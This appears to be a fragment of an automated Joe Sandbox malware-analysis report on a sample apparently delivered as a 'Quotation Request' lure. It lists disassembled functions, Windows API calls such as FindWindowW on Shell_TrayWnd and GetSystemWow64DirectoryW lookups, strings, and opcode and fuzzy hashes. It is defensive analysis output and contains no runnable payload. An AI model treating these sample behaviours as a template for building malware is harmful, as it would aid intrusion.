                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                      • API String ID: 3158253471-631824599
                                                      • Opcode ID: e037877de98bbb3d57bb02e33a8fa6666efa8b013ab8ba59d238e15b095d80d1
                                                      • Instruction ID: 31bc77809397379324137c93c5aea70f5d2c0c33052527723a25ebb842477ea1
                                                      • Opcode Fuzzy Hash: e037877de98bbb3d57bb02e33a8fa6666efa8b013ab8ba59d238e15b095d80d1
                                                      • Instruction Fuzzy Hash: 5CE06D742007018FD760DF68D8083467AE4FF00305F11896DE556C7782E7B8E444CBA1
                                                      Function 00811935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSystemDirectoryW.KERNEL32(?), ref: 00811775
                                                        • Part of subcall function 0084BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0081195E,?), ref: 0084BFFE
                                                        • Part of subcall function 0084BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0084C010
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0081196D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                      • String ID: WIN_XPe
                                                      • API String ID: 582185067-3257408948
                                                      • Opcode ID: 0ecc8c8cd04ade641dac3b82c928dc0ee3c119e8e0556478ffee7cb301e0a0a9
                                                      • Instruction ID: 330c470f09b14bfdf3b69f1dabb5e7619805e56aa621beaf8d39a9290d9fcf59
                                                      • Opcode Fuzzy Hash: 0ecc8c8cd04ade641dac3b82c928dc0ee3c119e8e0556478ffee7cb301e0a0a9
                                                      • Instruction Fuzzy Hash: 5EF0A570801109DBDB15DBA5C988AECBAB8FF08305F540496E202E2695DB758E84DF61
                                                      Function 00855998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008559AE
                                                      • PostMessageW.USER32(00000000), ref: 008559B5
                                                        • Part of subcall function 00835244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008352BC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      • Opcode ID: b105490f04f9e775f6df051f16b0c8c6c20281137e798007e8d9b2f7c91eab98
                                                      • Instruction ID: 695dfb7ee9613189fb1150574f82c97fd2926b7ad0be1b57af8f743ba2568302
                                                      • Opcode Fuzzy Hash: b105490f04f9e775f6df051f16b0c8c6c20281137e798007e8d9b2f7c91eab98
                                                      • Instruction Fuzzy Hash: 17D0C9313C0311BBE6A4BB70DC0BF976655FB54B51F000825B355EB1D1D9E8A800CA94
                                                      Function 00855964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0085596E
                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00855981
                                                        • Part of subcall function 00835244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008352BC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      • Opcode ID: c6723380e2ce72553f833635f03b76eb0315fef9b4103abf2afb8490d96738b3
                                                      • Instruction ID: 302fc801906148df5d9c1e8c5132dd297976f51df9be044fabf03ab4636c74d3
                                                      • Opcode Fuzzy Hash: c6723380e2ce72553f833635f03b76eb0315fef9b4103abf2afb8490d96738b3
                                                      • Instruction Fuzzy Hash: A6D0C935384311B7E6A4BB70DC0BF976A55FB50B51F000825B359EB1D1D9E89800CA94